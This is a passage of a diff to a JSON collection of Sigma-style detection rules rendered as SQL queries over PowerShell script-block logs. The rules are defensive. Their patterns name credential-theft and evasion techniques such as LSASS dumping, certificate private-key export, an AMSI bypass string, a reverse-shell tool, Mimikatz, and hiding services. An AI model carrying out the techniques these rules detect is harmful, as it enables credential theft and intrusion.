PowerShell", - "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", - "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Extracting Information with PowerShell", + "id": "bd5971a7-626d-46ab-8176-ed643f694f68", + "status": "test", + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" ], - "filename": "posh_ps_user_discovery_get_aduser.yml" + "filename": "posh_ps_susp_extracting.yml" }, { - "title": "Suspicious TCP Tunnel Via PowerShell Script", - "id": "bd33d2aa-497e-4651-9893-5c5364646595", + "title": "Change User Agents with WebRequest", + "id": "d4488827-73af-4f8d-9244-7b7662ef046e", "status": "experimental", - "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "author": "frack113", "tags": [ "attack.command_and_control", - "attack.t1090" + "attack.t1071.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_proxy_scripts.yml" + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", - "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Data Compressed - PowerShell", + "id": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "status": "test", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.exfiltration", + "attack.t1560" ], "falsepositives": [ - "Unknown" + "Highly likely if archive operations are done via PowerShell." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Recurse%' ESCAPE '\\' AND ScriptBlockText LIKE '%|%' ESCAPE '\\' AND ScriptBlockText LIKE '%Compress-Archive%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "posh_ps_data_compressed.yml" }, { - "title": "Malicious ShellIntel PowerShell Commandlets", - "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", "status": "test", - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001" @@ -7597,46 +7160,47 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "posh_ps_shellintel_malicious_commandlets.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Suspicious IO.FileStream", - "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "title": "Enable Windows Remote Management", + "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", "status": "test", - "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_iofilestream.yml" + "filename": "posh_ps_enable_psremoting.yml" }, { - "title": "PowerShell Hotfix Enumeration", - "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", - "status": "experimental", - "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "status": "test", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ - "Legitimate administration scripts" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "posh_ps_hotfix_enum.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { "title": "Powershell MsXml COM Object", @@ -7658,325 +7222,390 @@ "filename": "posh_ps_msxml_com.yml" }, { - "title": "Powershell Local Email Collection", - "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", - "status": "test", - "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", - "author": "frack113", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "status": "experimental", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1114.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mail_acces.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { - "title": "Winlogon Helper DLL", - "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", + "id": "db885529-903f-4c5d-9864-28fe199e6370", "status": "experimental", - "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "posh_ps_winlogon_helper_dll.yml" + "filename": "posh_ps_computer_discovery_get_adcomputer.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled", - "id": "55c925c1-7195-426b-a136-a9396800e29b", + "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", + "id": "afd3df04-948d-46f6-ae44-25966c44b97f", "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" ], - "filename": "posh_ps_enable_susp_windows_optional_feature.yml" + "filename": "posh_ps_psasyncshell.yml" }, { - "title": "Suspicious Mount-DiskImage", - "id": "29e1c216-6408-489d-8a06-ee9d151ef819", - "status": "test", - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "author": "frack113", + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "status": "experimental", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1553.005" + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mount_diskimage.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", + "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "status": "experimental", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockText LIKE '%#%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "posh_ps_amsi_null_bits_bypass.yml" }, { - "title": "Replace Desktop Wallpaper by Powershell", - "id": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", + "title": "Malicious ShellIntel PowerShell Commandlets", + "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", "status": "test", - "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", - "author": "frack113", + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-ItemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%Registry::%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%WallPaper%' ESCAPE '\\') OR ScriptBlockText LIKE '%SystemParametersInfo(20,0,%,3)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_wallpaper.yml" + "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", - "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", + "title": "Potential WinAPI Calls Via PowerShell Scripts", + "id": "03d83090-8cba-44a0-b02f-0b756a050306", "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Detects use of WinAPI Functions in PowerShell scripts", + "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1106" + ], + "falsepositives": [ + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" + ], + "filename": "posh_ps_accessing_win_api.yml" + }, + { + "title": "Powershell Local Email Collection", + "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "status": "test", + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", "author": "frack113", "tags": [ "attack.collection", - "attack.t1074.001" + "attack.t1114.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_zip_compress.yml" + "filename": "posh_ps_susp_mail_acces.yml" }, { - "title": "Potential Data Exfiltration Via Audio File", - "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", + "title": "Import PowerShell Modules From Suspicious Directories", + "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "status": "experimental", - "description": "Detects potential exfiltration attempt via audio file using PowerShell", + "description": "Detects powershell scripts that import modules from suspicious directories", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE 